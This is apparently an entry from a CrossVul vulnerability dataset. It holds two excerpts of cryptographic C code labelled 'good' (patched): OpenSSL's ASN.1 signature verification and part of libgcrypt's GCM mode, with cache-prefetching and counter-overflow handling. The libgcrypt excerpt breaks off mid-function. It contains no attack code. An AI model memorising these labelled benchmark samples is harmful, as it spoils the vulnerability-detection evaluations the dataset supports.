ASN1err(ASN1_F_ASN1_VERIFY, ASN1_R_INVALID_BIT_STRING_BITS_LEFT);
goto err;
}
inl=i2d(data,NULL);
buf_in=OPENSSL_malloc((unsigned int)inl);
if (buf_in == NULL)
{
ASN1err(ASN1_F_ASN1_VERIFY,ERR_R_MALLOC_FAILURE);
goto err;
}
p=buf_in;
i2d(data,&p);
ret=
EVP_VerifyInit_ex(&ctx,type, NULL)
&& EVP_VerifyUpdate(&ctx,(unsigned char *)buf_in,inl);
OPENSSL_cleanse(buf_in,(unsigned int)inl);
OPENSSL_free(buf_in);
if (!ret)
{
ASN1err(ASN1_F_ASN1_VERIFY,ERR_R_EVP_LIB);
goto err;
}
ret = -1;
if (EVP_VerifyFinal(&ctx,(unsigned char *)signature->data,
(unsigned int)signature->length,pkey) <= 0)
{
ASN1err(ASN1_F_ASN1_VERIFY,ERR_R_EVP_LIB);
ret=0;
goto err;
}
/* we don't need to zero the 'ctx' because we just checked
* public information */
/* memset(&ctx,0,sizeof(ctx)); */
ret=1;
err:
EVP_MD_CTX_cleanup(&ctx);
return(ret);
}
#endif
int ASN1_item_verify(const ASN1_ITEM *it, X509_ALGOR *a,
ASN1_BIT_STRING *signature, void *asn, EVP_PKEY *pkey)
{
EVP_MD_CTX ctx;
unsigned char *buf_in=NULL;
int ret= -1,inl;
int mdnid, pknid;
if (!pkey)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY, ERR_R_PASSED_NULL_PARAMETER);
return -1;
}
if (signature->type == V_ASN1_BIT_STRING && signature->flags & 0x7)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY, ASN1_R_INVALID_BIT_STRING_BITS_LEFT);
return -1;
}
EVP_MD_CTX_init(&ctx);
/* Convert signature OID into digest and public key OIDs */
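/* OBJ_find_sigid_algs() splits a composite signature OID such as
* sha256WithRSAEncryption into its digest NID (e.g. NID_sha256) and its
* public key NID (e.g. NID_rsaEncryption). A digest NID of NID_undef
* signals an algorithm that the EVP_PKEY method must verify itself via
* item_verify(), which is the branch taken below.
*/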
if (!OBJ_find_sigid_algs(OBJ_obj2nid(a->algorithm), &mdnid, &pknid))
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ASN1_R_UNKNOWN_SIGNATURE_ALGORITHM);
goto err;
}
if (mdnid == NID_undef)
{
if (!pkey->ameth || !pkey->ameth->item_verify)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ASN1_R_UNKNOWN_SIGNATURE_ALGORITHM);
goto err;
}
ret = pkey->ameth->item_verify(&ctx, it, asn, a,
signature, pkey);
/* Return value of 2 means carry on, anything else means we
* exit straight away: either a fatal error occurred or the underlying
* verification routine handles all verification.
*/
if (ret != 2)
goto err;
ret = -1;
}
else
{
const EVP_MD *type;
type=EVP_get_digestbynid(mdnid);
if (type == NULL)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ASN1_R_UNKNOWN_MESSAGE_DIGEST_ALGORITHM);
goto err;
}
/* Check public key OID matches public key type */
if (EVP_PKEY_type(pknid) != pkey->ameth->pkey_id)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ASN1_R_WRONG_PUBLIC_KEY_TYPE);
goto err;
}
if (!EVP_DigestVerifyInit(&ctx, NULL, type, NULL, pkey))
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ERR_R_EVP_LIB);
ret=0;
goto err;
}
}
inl = ASN1_item_i2d(asn, &buf_in, it);
if (buf_in == NULL)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ERR_R_MALLOC_FAILURE);
goto err;
}
ret = EVP_DigestVerifyUpdate(&ctx,buf_in,inl);
OPENSSL_cleanse(buf_in,(unsigned int)inl);
OPENSSL_free(buf_in);
if (!ret)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ERR_R_EVP_LIB);
goto err;
}
ret = -1;
if (EVP_DigestVerifyFinal(&ctx,signature->data,
(size_t)signature->length) <= 0)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ERR_R_EVP_LIB);
ret=0;
goto err;
}
/* we don't need to zero the 'ctx' because we just checked
* public information */
/* memset(&ctx,0,sizeof(ctx)); */
ret=1;
err:
EVP_MD_CTX_cleanup(&ctx);
return(ret);
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/good_2310_0 |
crossvul-cpp_data_good_892_0 | /* cipher-gcm.c - Generic Galois Counter Mode implementation
* Copyright (C) 2013 Dmitry Eremin-Solenikov
* Copyright (C) 2013, 2018-2019 Jussi Kivilinna <jussi.kivilinna@iki.fi>
*
* This file is part of Libgcrypt.
*
* Libgcrypt is free software; you can redistribute it and/or modify
* it under the terms of the GNU Lesser general Public License as
* published by the Free Software Foundation; either version 2.1 of
* the License, or (at your option) any later version.
*
* Libgcrypt is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this program; if not, see <http://www.gnu.org/licenses/>.
*/
#include <config.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include "g10lib.h"
#include "cipher.h"
#include "bufhelp.h"
#include "./cipher-internal.h"
/* Helper macro to force alignment to 16 or 64 bytes. */
#ifdef HAVE_GCC_ATTRIBUTE_ALIGNED
# define ATTR_ALIGNED_64 __attribute__ ((aligned (64)))
#else
# define ATTR_ALIGNED_64
#endif
#ifdef GCM_USE_INTEL_PCLMUL
extern void _gcry_ghash_setup_intel_pclmul (gcry_cipher_hd_t c);
extern unsigned int _gcry_ghash_intel_pclmul (gcry_cipher_hd_t c, byte *result,
const byte *buf, size_t nblocks);
#endif
#ifdef GCM_USE_ARM_PMULL
extern void _gcry_ghash_setup_armv8_ce_pmull (void *gcm_key, void *gcm_table);
extern unsigned int _gcry_ghash_armv8_ce_pmull (void *gcm_key, byte *result,
const byte *buf, size_t nblocks,
void *gcm_table);
static void
ghash_setup_armv8_ce_pmull (gcry_cipher_hd_t c)
{
_gcry_ghash_setup_armv8_ce_pmull(c->u_mode.gcm.u_ghash_key.key,
c->u_mode.gcm.gcm_table);
}
static unsigned int
ghash_armv8_ce_pmull (gcry_cipher_hd_t c, byte *result, const byte *buf,
size_t nblocks)
{
return _gcry_ghash_armv8_ce_pmull(c->u_mode.gcm.u_ghash_key.key, result, buf,
nblocks, c->u_mode.gcm.gcm_table);
}
#endif /* GCM_USE_ARM_PMULL */
#ifdef GCM_USE_ARM_NEON
extern void _gcry_ghash_setup_armv7_neon (void *gcm_key);
extern unsigned int _gcry_ghash_armv7_neon (void *gcm_key, byte *result,
const byte *buf, size_t nblocks);
static void
ghash_setup_armv7_neon (gcry_cipher_hd_t c)
{
_gcry_ghash_setup_armv7_neon(c->u_mode.gcm.u_ghash_key.key);
}
static unsigned int
ghash_armv7_neon (gcry_cipher_hd_t c, byte *result, const byte *buf,
size_t nblocks)
{
return _gcry_ghash_armv7_neon(c->u_mode.gcm.u_ghash_key.key, result, buf,
nblocks);
}
#endif /* GCM_USE_ARM_NEON */
#ifdef GCM_USE_TABLES
static struct
{
volatile u32 counter_head;
u32 cacheline_align[64 / 4 - 1];
u16 R[256];
volatile u32 counter_tail;
} gcm_table ATTR_ALIGNED_64 =
{
0,
{ 0, },
{
0x0000, 0x01c2, 0x0384, 0x0246, 0x0708, 0x06ca, 0x048c, 0x054e,
0x0e10, 0x0fd2, 0x0d94, 0x0c56, 0x0918, 0x08da, 0x0a9c, 0x0b5e,
0x1c20, 0x1de2, 0x1fa4, 0x1e66, 0x1b28, 0x1aea, 0x18ac, 0x196e,
0x1230, 0x13f2, 0x11b4, 0x1076, 0x1538, 0x14fa, 0x16bc, 0x177e,
0x3840, 0x3982, 0x3bc4, 0x3a06, 0x3f48, 0x3e8a, 0x3ccc, 0x3d0e,
0x3650, 0x3792, 0x35d4, 0x3416, 0x3158, 0x309a, 0x32dc, 0x331e,
0x2460, 0x25a2, 0x27e4, 0x2626, 0x2368, 0x22aa, 0x20ec, 0x212e,
0x2a70, 0x2bb2, 0x29f4, 0x2836, 0x2d78, 0x2cba, 0x2efc, 0x2f3e,
0x7080, 0x7142, 0x7304, 0x72c6, 0x7788, 0x764a, 0x740c, 0x75ce,
0x7e90, 0x7f52, 0x7d14, 0x7cd6, 0x7998, 0x785a, 0x7a1c, 0x7bde,
0x6ca0, 0x6d62, 0x6f24, 0x6ee6, 0x6ba8, 0x6a6a, 0x682c, 0x69ee,
0x62b0, 0x6372, 0x6134, 0x60f6, 0x65b8, 0x647a, 0x663c, 0x67fe,
0x48c0, 0x4902, 0x4b44, 0x4a86, 0x4fc8, 0x4e0a, 0x4c4c, 0x4d8e,
0x46d0, 0x4712, 0x4554, 0x4496, 0x41d8, 0x401a, 0x425c, 0x439e,
0x54e0, 0x5522, 0x5764, 0x56a6, 0x53e8, 0x522a, 0x506c, 0x51ae,
0x5af0, 0x5b32, 0x5974, 0x58b6, 0x5df8, 0x5c3a, 0x5e7c, 0x5fbe,
0xe100, 0xe0c2, 0xe284, 0xe346, 0xe608, 0xe7ca, 0xe58c, 0xe44e,
0xef10, 0xeed2, 0xec94, 0xed56, 0xe818, 0xe9da, 0xeb9c, 0xea5e,
0xfd20, 0xfce2, 0xfea4, 0xff66, 0xfa28, 0xfbea, 0xf9ac, 0xf86e,
0xf330, 0xf2f2, 0xf0b4, 0xf176, 0xf438, 0xf5fa, 0xf7bc, 0xf67e,
0xd940, 0xd882, 0xdac4, 0xdb06, 0xde48, 0xdf8a, 0xddcc, 0xdc0e,
0xd750, 0xd692, 0xd4d4, 0xd516, 0xd058, 0xd19a, 0xd3dc, 0xd21e,
0xc560, 0xc4a2, 0xc6e4, 0xc726, 0xc268, 0xc3aa, 0xc1ec, 0xc02e,
0xcb70, 0xcab2, 0xc8f4, 0xc936, 0xcc78, 0xcdba, 0xcffc, 0xce3e,
0x9180, 0x9042, 0x9204, 0x93c6, 0x9688, 0x974a, 0x950c, 0x94ce,
0x9f90, 0x9e52, 0x9c14, 0x9dd6, 0x9898, 0x995a, 0x9b1c, 0x9ade,
0x8da0, 0x8c62, 0x8e24, 0x8fe6, 0x8aa8, 0x8b6a, 0x892c, 0x88ee,
0x83b0, 0x8272, 0x8034, 0x81f6, 0x84b8, 0x857a, 0x873c, 0x86fe,
0xa9c0, 0xa802, 0xaa44, 0xab86, 0xaec8, 0xaf0a, 0xad4c, 0xac8e,
0xa7d0, 0xa612, 0xa454, 0xa596, 0xa0d8, 0xa11a, 0xa35c, 0xa29e,
0xb5e0, 0xb422, 0xb664, 0xb7a6, 0xb2e8, 0xb32a, 0xb16c, 0xb0ae,
0xbbf0, 0xba32, 0xb874, 0xb9b6, 0xbcf8, 0xbd3a, 0xbf7c, 0xbebe,
},
0
};
#define gcmR gcm_table.R
static inline
void prefetch_table(const void *tab, size_t len)
{
const volatile byte *vtab = tab;
size_t i;
for (i = 0; len - i >= 8 * 32; i += 8 * 32)
{
(void)vtab[i + 0 * 32];
(void)vtab[i + 1 * 32];
(void)vtab[i + 2 * 32];
(void)vtab[i + 3 * 32];
(void)vtab[i + 4 * 32];
(void)vtab[i + 5 * 32];
(void)vtab[i + 6 * 32];
(void)vtab[i + 7 * 32];
}
for (; i < len; i += 32)
{
(void)vtab[i];
}
(void)vtab[len - 1];
}
static inline void
do_prefetch_tables (const void *gcmM, size_t gcmM_size)
{
/* Modify counters to trigger copy-on-write and unsharing if physical pages
* of look-up table are shared between processes. Modifying counters also
* causes checksums for pages to change and hint same-page merging algorithm
* that these pages are frequently changing. */
gcm_table.counter_head++;
gcm_table.counter_tail++;
/* Prefetch look-up tables to cache. */
prefetch_table(gcmM, gcmM_size);
prefetch_table(&gcm_table, sizeof(gcm_table));
}
#ifdef GCM_TABLES_USE_U64
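/* bshift() below multiplies a 128-bit field element by x, i.e. shifts it
* right by one bit in GHASH's bit-reflected representation. When the bit
* shifted out was set, the result is reduced by XORing the constant 0xe1
* into the top byte, which corresponds to the GHASH reduction polynomial
* x^128 + x^7 + x^2 + x + 1 in that reflected representation.
*/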
static void
bshift (u64 * b0, u64 * b1)
{
u64 t[2], mask;
t[0] = *b0;
t[1] = *b1;
mask = -(t[1] & 1) & 0xe1;
mask <<= 56;
*b1 = (t[1] >> 1) ^ (t[0] << 63);
*b0 = (t[0] >> 1) ^ mask;
}
static void
do_fillM (unsigned char *h, u64 *M)
{
int i, j;
M[0 + 0] = 0;
M[0 + 16] = 0;
M[8 + 0] = buf_get_be64 (h + 0);
M[8 + 16] = buf_get_be64 (h + 8);
for (i = 4; i > 0; i /= 2)
{
M[i + 0] = M[2 * i + 0];
M[i + 16] = M[2 * i + 16];
bshift (&M[i], &M[i + 16]);
}
for (i = 2; i < 16; i *= 2)
for (j = 1; j < i; j++)
{
M[(i + j) + 0] = M[i + 0] ^ M[j + 0];
M[(i + j) + 16] = M[i + 16] ^ M[j + 16];
}
for (i = 0; i < 16; i++)
{
M[i + 32] = (M[i + 0] >> 4) ^ ((u64) gcmR[(M[i + 16] & 0xf) << 4] << 48);
M[i + 48] = (M[i + 16] >> 4) ^ (M[i + 0] << 60);
}
}
static inline unsigned int
do_ghash (unsigned char *result, const unsigned char *buf, const u64 *gcmM)
{
u64 V[2];
u64 tmp[2];
const u64 *M;
u64 T;
u32 A;
int i;
cipher_block_xor (V, result, buf, 16);
V[0] = be_bswap64 (V[0]);
V[1] = be_bswap64 (V[1]);
/* First round can be manually tweaked based on fact that 'tmp' is zero. */
M = &gcmM[(V[1] & 0xf) + 32];
V[1] >>= 4;
tmp[0] = M[0];
tmp[1] = M[16];
tmp[0] ^= gcmM[(V[1] & 0xf) + 0];
tmp[1] ^= gcmM[(V[1] & 0xf) + 16];
V[1] >>= 4;
i = 6;
while (1)
{
M = &gcmM[(V[1] & 0xf) + 32];
V[1] >>= 4;
A = tmp[1] & 0xff;
T = tmp[0];
tmp[0] = (T >> 8) ^ ((u64) gcmR[A] << 48) ^ gcmM[(V[1] & 0xf) + 0];
tmp[1] = (T << 56) ^ (tmp[1] >> 8) ^ gcmM[(V[1] & 0xf) + 16];
tmp[0] ^= M[0];
tmp[1] ^= M[16];
if (i == 0)
break;
V[1] >>= 4;
--i;
}
i = 7;
while (1)
{
M = &gcmM[(V[0] & 0xf) + 32];
V[0] >>= 4;
A = tmp[1] & 0xff;
T = tmp[0];
tmp[0] = (T >> 8) ^ ((u64) gcmR[A] << 48) ^ gcmM[(V[0] & 0xf) + 0];
tmp[1] = (T << 56) ^ (tmp[1] >> 8) ^ gcmM[(V[0] & 0xf) + 16];
tmp[0] ^= M[0];
tmp[1] ^= M[16];
if (i == 0)
break;
V[0] >>= 4;
--i;
}
buf_put_be64 (result + 0, tmp[0]);
buf_put_be64 (result + 8, tmp[1]);
return (sizeof(V) + sizeof(T) + sizeof(tmp) +
sizeof(int)*2 + sizeof(void*)*5);
}
#else /*!GCM_TABLES_USE_U64*/
static void
bshift (u32 * M, int i)
{
u32 t[4], mask;
t[0] = M[i * 4 + 0];
t[1] = M[i * 4 + 1];
t[2] = M[i * 4 + 2];
t[3] = M[i * 4 + 3];
mask = -(t[3] & 1) & 0xe1;
M[i * 4 + 3] = (t[3] >> 1) ^ (t[2] << 31);
M[i * 4 + 2] = (t[2] >> 1) ^ (t[1] << 31);
M[i * 4 + 1] = (t[1] >> 1) ^ (t[0] << 31);
M[i * 4 + 0] = (t[0] >> 1) ^ (mask << 24);
}
static void
do_fillM (unsigned char *h, u32 *M)
{
int i, j;
M[0 * 4 + 0] = 0;
M[0 * 4 + 1] = 0;
M[0 * 4 + 2] = 0;
M[0 * 4 + 3] = 0;
M[8 * 4 + 0] = buf_get_be32 (h + 0);
M[8 * 4 + 1] = buf_get_be32 (h + 4);
M[8 * 4 + 2] = buf_get_be32 (h + 8);
M[8 * 4 + 3] = buf_get_be32 (h + 12);
for (i = 4; i > 0; i /= 2)
{
M[i * 4 + 0] = M[2 * i * 4 + 0];
M[i * 4 + 1] = M[2 * i * 4 + 1];
M[i * 4 + 2] = M[2 * i * 4 + 2];
M[i * 4 + 3] = M[2 * i * 4 + 3];
bshift (M, i);
}
for (i = 2; i < 16; i *= 2)
for (j = 1; j < i; j++)
{
M[(i + j) * 4 + 0] = M[i * 4 + 0] ^ M[j * 4 + 0];
M[(i + j) * 4 + 1] = M[i * 4 + 1] ^ M[j * 4 + 1];
M[(i + j) * 4 + 2] = M[i * 4 + 2] ^ M[j * 4 + 2];
M[(i + j) * 4 + 3] = M[i * 4 + 3] ^ M[j * 4 + 3];
}
for (i = 0; i < 4 * 16; i += 4)
{
M[i + 0 + 64] = (M[i + 0] >> 4)
^ ((u64) gcmR[(M[i + 3] << 4) & 0xf0] << 16);
M[i + 1 + 64] = (M[i + 1] >> 4) ^ (M[i + 0] << 28);
M[i + 2 + 64] = (M[i + 2] >> 4) ^ (M[i + 1] << 28);
M[i + 3 + 64] = (M[i + 3] >> 4) ^ (M[i + 2] << 28);
}
}
static inline unsigned int
do_ghash (unsigned char *result, const unsigned char *buf, const u32 *gcmM)
{
byte V[16];
u32 tmp[4];
u32 v;
const u32 *M, *m;
u32 T[3];
int i;
cipher_block_xor (V, result, buf, 16); /* V is big-endian */
  /* The first round can be manually tweaked based on the fact that 'tmp' is zero. */
i = 15;
v = V[i];
M = &gcmM[(v & 0xf) * 4 + 64];
v = (v & 0xf0) >> 4;
m = &gcmM[v * 4];
v = V[--i];
tmp[0] = M[0] ^ m[0];
tmp[1] = M[1] ^ m[1];
tmp[2] = M[2] ^ m[2];
tmp[3] = M[3] ^ m[3];
while (1)
{
M = &gcmM[(v & 0xf) * 4 + 64];
v = (v & 0xf0) >> 4;
m = &gcmM[v * 4];
T[0] = tmp[0];
T[1] = tmp[1];
T[2] = tmp[2];
tmp[0] = (T[0] >> 8) ^ ((u32) gcmR[tmp[3] & 0xff] << 16) ^ m[0];
tmp[1] = (T[0] << 24) ^ (tmp[1] >> 8) ^ m[1];
tmp[2] = (T[1] << 24) ^ (tmp[2] >> 8) ^ m[2];
tmp[3] = (T[2] << 24) ^ (tmp[3] >> 8) ^ m[3];
tmp[0] ^= M[0];
tmp[1] ^= M[1];
tmp[2] ^= M[2];
tmp[3] ^= M[3];
if (i == 0)
break;
v = V[--i];
}
buf_put_be32 (result + 0, tmp[0]);
buf_put_be32 (result + 4, tmp[1]);
buf_put_be32 (result + 8, tmp[2]);
buf_put_be32 (result + 12, tmp[3]);
return (sizeof(V) + sizeof(T) + sizeof(tmp) +
sizeof(int)*2 + sizeof(void*)*6);
}
#endif /*!GCM_TABLES_USE_U64*/
#define fillM(c) \
do_fillM (c->u_mode.gcm.u_ghash_key.key, c->u_mode.gcm.gcm_table)
#define GHASH(c, result, buf) do_ghash (result, buf, c->u_mode.gcm.gcm_table)
#define prefetch_tables(c) \
do_prefetch_tables(c->u_mode.gcm.gcm_table, sizeof(c->u_mode.gcm.gcm_table))
#else
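/* Table-free fallback: here bshift() shifts the 128-bit value held in four
 * words right by one bit and returns the bit that was shifted out; the
 * caller folds the GCM reduction constant 0xe1000000 back into the top word
 * whenever that bit was set. */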
static unsigned long
bshift (unsigned long *b)
{
unsigned long c;
int i;
c = b[3] & 1;
for (i = 3; i > 0; i--)
{
b[i] = (b[i] >> 1) | (b[i - 1] << 31);
}
b[i] >>= 1;
return c;
}
static unsigned int
do_ghash (unsigned char *hsub, unsigned char *result, const unsigned char *buf)
{
unsigned long V[4];
int i, j;
byte *p;
#ifdef WORDS_BIGENDIAN
p = result;
#else
unsigned long T[4];
cipher_block_xor (V, result, buf, 16);
for (i = 0; i < 4; i++)
{
V[i] = (V[i] & 0x00ff00ff) << 8 | (V[i] & 0xff00ff00) >> 8;
V[i] = (V[i] & 0x0000ffff) << 16 | (V[i] & 0xffff0000) >> 16;
}
p = (byte *) T;
#endif
memset (p, 0, 16);
for (i = 0; i < 16; i++)
{
for (j = 0x80; j; j >>= 1)
{
if (hsub[i] & j)
cipher_block_xor (p, p, V, 16);
if (bshift (V))
V[0] ^= 0xe1000000;
}
}
#ifndef WORDS_BIGENDIAN
for (i = 0, p = (byte *) T; i < 16; i += 4, p += 4)
{
result[i + 0] = p[3];
result[i + 1] = p[2];
result[i + 2] = p[1];
result[i + 3] = p[0];
}
#endif
return (sizeof(V) + sizeof(T) + sizeof(int)*2 + sizeof(void*)*5);
}
#define fillM(c) do { } while (0)
#define GHASH(c, result, buf) do_ghash (c->u_mode.gcm.u_ghash_key.key, result, buf)
#define prefetch_tables(c) do {} while (0)
#endif /* !GCM_USE_TABLES */
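/* Note on the return values above: each do_ghash() variant returns a rough
 * estimate of the stack bytes it touched with key-dependent data (the sizes
 * of its local variables plus some slack).  The value propagates through
 * ghash_internal() and do_ghash_buf() to _gcry_burn_stack(), which clears
 * that many bytes of stack afterwards. */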
static unsigned int
ghash_internal (gcry_cipher_hd_t c, byte *result, const byte *buf,
size_t nblocks)
{
const unsigned int blocksize = GCRY_GCM_BLOCK_LEN;
unsigned int burn = 0;
prefetch_tables (c);
while (nblocks)
{
burn = GHASH (c, result, buf);
buf += blocksize;
nblocks--;
}
return burn + (burn ? 5*sizeof(void*) : 0);
}
static void
setupM (gcry_cipher_hd_t c)
{
#if defined(GCM_USE_INTEL_PCLMUL) || defined(GCM_USE_ARM_PMULL)
unsigned int features = _gcry_get_hw_features ();
#endif
if (0)
;
#ifdef GCM_USE_INTEL_PCLMUL
else if (features & HWF_INTEL_PCLMUL)
{
c->u_mode.gcm.ghash_fn = _gcry_ghash_intel_pclmul;
_gcry_ghash_setup_intel_pclmul (c);
}
#endif
#ifdef GCM_USE_ARM_PMULL
else if (features & HWF_ARM_PMULL)
{
c->u_mode.gcm.ghash_fn = ghash_armv8_ce_pmull;
ghash_setup_armv8_ce_pmull (c);
}
#endif
#ifdef GCM_USE_ARM_NEON
else if (features & HWF_ARM_NEON)
{
c->u_mode.gcm.ghash_fn = ghash_armv7_neon;
ghash_setup_armv7_neon (c);
}
#endif
else
{
c->u_mode.gcm.ghash_fn = ghash_internal;
fillM (c);
}
}
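/* The GCM byte counters below are 64-bit values stored as two u32 words:
 * ctr[0] holds the low 32 bits and ctr[1] the high 32 bits.  In
 * gcm_bytecounter_add() the double shift ((add >> 31) >> 1) extracts the
 * high half of 'add' without performing a shift by 32, which would be
 * undefined when size_t is only 32 bits wide; the final comparison detects
 * the carry out of the low word for the usual case of a sub-4GiB addition. */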
static inline void
gcm_bytecounter_add (u32 ctr[2], size_t add)
{
if (sizeof(add) > sizeof(u32))
{
u32 high_add = ((add >> 31) >> 1) & 0xffffffff;
ctr[1] += high_add;
}
ctr[0] += add;
if (ctr[0] >= add)
return;
++ctr[1];
}
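/* gcm_add32_be128() below treats the last four bytes of the counter block
 * as a big-endian u32, adds 'add' to it and returns the updated value in
 * host byte order.  Calling it with add == 0 is a cheap way to read the
 * current low counter word (see gcm_ctr_encrypt). */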
static inline u32
gcm_add32_be128 (byte *ctr, unsigned int add)
{
/* 'ctr' must be aligned to four bytes. */
const unsigned int blocksize = GCRY_GCM_BLOCK_LEN;
u32 *pval = (u32 *)(void *)(ctr + blocksize - sizeof(u32));
u32 val;
val = be_bswap32(*pval) + add;
*pval = be_bswap32(val);
return val; /* return result as host-endian value */
}
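/* Worked derivation of the limit checked below: SP 800-38D caps the
 * plaintext at 2^39 - 256 bits = 2^36 - 32 bytes.  As a 64-bit byte count
 * that is 0xfffffffe0, i.e. a high word of 0xf and a low word of
 * 0xffffffe0, which is exactly what gcm_check_datalen() tests. */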
static inline int
gcm_check_datalen (u32 ctr[2])
{
/* len(plaintext) <= 2^39-256 bits == 2^36-32 bytes == 2^32-2 blocks */
if (ctr[1] > 0xfU)
return 0;
if (ctr[1] < 0xfU)
return 1;
if (ctr[0] <= 0xffffffe0U)
return 1;
return 0;
}
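/* Similarly for AAD and IV: the limit of 2^64 - 1 bits is roughly 2^61
 * bytes, and the check below allows byte counts up to 0x1fffffffffffffff
 * (high word 0x1fffffff, low word 0xffffffff), i.e. 2^61 - 1 bytes. */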
static inline int
gcm_check_aadlen_or_ivlen (u32 ctr[2])
{
/* len(aad/iv) <= 2^64-1 bits ~= 2^61-1 bytes */
if (ctr[1] > 0x1fffffffU)
return 0;
if (ctr[1] < 0x1fffffffU)
return 1;
if (ctr[0] <= 0xffffffffU)
return 1;
return 0;
}
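/* do_ghash_buf() below buffers partial blocks in c->u_mode.gcm.macbuf and
 * only calls the selected ghash_fn on full 16-byte blocks; with do_padding
 * set, a trailing partial block is zero-padded and flushed, which is how the
 * AAD stream, the IV and the final length block are closed off. */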
static void
do_ghash_buf(gcry_cipher_hd_t c, byte *hash, const byte *buf,
size_t buflen, int do_padding)
{
unsigned int blocksize = GCRY_GCM_BLOCK_LEN;
unsigned int unused = c->u_mode.gcm.mac_unused;
ghash_fn_t ghash_fn = c->u_mode.gcm.ghash_fn;
size_t nblocks, n;
unsigned int burn = 0;
if (buflen == 0 && (unused == 0 || !do_padding))
return;
do
{
if (buflen > 0 && (buflen + unused < blocksize || unused > 0))
{
n = blocksize - unused;
n = n < buflen ? n : buflen;
buf_cpy (&c->u_mode.gcm.macbuf[unused], buf, n);
unused += n;
buf += n;
buflen -= n;
}
if (!buflen)
{
if (!do_padding)
break;
n = blocksize - unused;
if (n > 0)
{
memset (&c->u_mode.gcm.macbuf[unused], 0, n);
unused = blocksize;
}
}
if (unused > 0)
{
gcry_assert (unused == blocksize);
/* Process one block from macbuf. */
burn = ghash_fn (c, hash, c->u_mode.gcm.macbuf, 1);
unused = 0;
}
nblocks = buflen / blocksize;
if (nblocks)
{
burn = ghash_fn (c, hash, buf, nblocks);
buf += blocksize * nblocks;
buflen -= blocksize * nblocks;
}
}
while (buflen > 0);
c->u_mode.gcm.mac_unused = unused;
if (burn)
_gcry_burn_stack (burn);
}
static gcry_err_code_t
gcm_ctr_encrypt (gcry_cipher_hd_t c, byte *outbuf, size_t outbuflen,
const byte *inbuf, size_t inbuflen)
{
gcry_err_code_t err = 0;
while (inbuflen)
{
u32 nblocks_to_overflow;
u32 num_ctr_increments;
u32 curr_ctr_low;
size_t currlen = inbuflen;
byte ctr_copy[GCRY_GCM_BLOCK_LEN];
int fix_ctr = 0;
      /* GCM CTR increments only the least significant 32 bits of the
       * counter, without carry into the upper 96 bits.  Using the generic
       * CTR implementation directly would carry a 32-bit overflow into the
       * upper 96 bits.  Detect whether the input length is long enough to
       * cause an overflow, and limit the input length so that the CTR
       * overflow happens but the updated CTR value is not used to encrypt
       * further input.  After the overflow, the upper 96 bits of the CTR
       * are restored to cancel out the modification done by the generic
       * CTR encryption. */
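      /* Illustrative example: if the low counter word is 0xfffffffe and
       * several more blocks remain, nblocks_to_overflow is 2, so only two
       * blocks (plus any bytes already buffered in c->unused) are encrypted
       * in this pass.  The generic CTR code then carries into the upper 96
       * bits, which are restored below from ctr_copy before the next pass. */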
if (inbuflen > c->unused)
{
curr_ctr_low = gcm_add32_be128 (c->u_ctr.ctr, 0);
/* Number of CTR increments this inbuflen would cause. */
num_ctr_increments = (inbuflen - c->unused) / GCRY_GCM_BLOCK_LEN +
!!((inbuflen - c->unused) % GCRY_GCM_BLOCK_LEN);
if ((u32)(num_ctr_increments + curr_ctr_low) < curr_ctr_low)
{
nblocks_to_overflow = 0xffffffffU - curr_ctr_low + 1;
currlen = nblocks_to_overflow * GCRY_GCM_BLOCK_LEN + c->unused;
if (currlen > inbuflen)
{
currlen = inbuflen;
}
fix_ctr = 1;
cipher_block_cpy(ctr_copy, c->u_ctr.ctr, GCRY_GCM_BLOCK_LEN);
}
}
err = _gcry_cipher_ctr_encrypt(c, outbuf, outbuflen, inbuf, currlen);
if (err != 0)
return err;
if (fix_ctr)
{
/* Lower 32-bits of CTR should now be zero. */
gcry_assert(gcm_add32_be128 (c->u_ctr.ctr, 0) == 0);
/* Restore upper part of CTR. */
buf_cpy(c->u_ctr.ctr, ctr_copy, GCRY_GCM_BLOCK_LEN - sizeof(u32));
wipememory(ctr_copy, sizeof(ctr_copy));
}
inbuflen -= currlen;
inbuf += currlen;
outbuflen -= currlen;
outbuf += currlen;
}
return err;
}
gcry_err_code_t
_gcry_cipher_gcm_encrypt (gcry_cipher_hd_t c,
byte *outbuf, size_t outbuflen,
const byte *inbuf, size_t inbuflen)
{
static const unsigned char zerobuf[MAX_BLOCKSIZE];
gcry_err_code_t err;
if (c->spec->blocksize != GCRY_GCM_BLOCK_LEN)
return GPG_ERR_CIPHER_ALGO;
if (outbuflen < inbuflen)
return GPG_ERR_BUFFER_TOO_SHORT;
if (c->u_mode.gcm.datalen_over_limits)
return GPG_ERR_INV_LENGTH;
if (c->marks.tag
|| c->u_mode.gcm.ghash_data_finalized
|| !c->u_mode.gcm.ghash_fn)
return GPG_ERR_INV_STATE;
if (!c->marks.iv)
_gcry_cipher_gcm_setiv (c, zerobuf, GCRY_GCM_BLOCK_LEN);
if (c->u_mode.gcm.disallow_encryption_because_of_setiv_in_fips_mode)
return GPG_ERR_INV_STATE;
if (!c->u_mode.gcm.ghash_aad_finalized)
{
/* Start of encryption marks end of AAD stream. */
do_ghash_buf(c, c->u_mode.gcm.u_tag.tag, NULL, 0, 1);
c->u_mode.gcm.ghash_aad_finalized = 1;
}
gcm_bytecounter_add(c->u_mode.gcm.datalen, inbuflen);
if (!gcm_check_datalen(c->u_mode.gcm.datalen))
{
c->u_mode.gcm.datalen_over_limits = 1;
return GPG_ERR_INV_LENGTH;
}
while (inbuflen)
{
size_t currlen = inbuflen;
/* Since checksumming is done after encryption, process input in 24KiB
* chunks to keep data loaded in L1 cache for checksumming. */
if (currlen > 24 * 1024)
currlen = 24 * 1024;
err = gcm_ctr_encrypt(c, outbuf, outbuflen, inbuf, currlen);
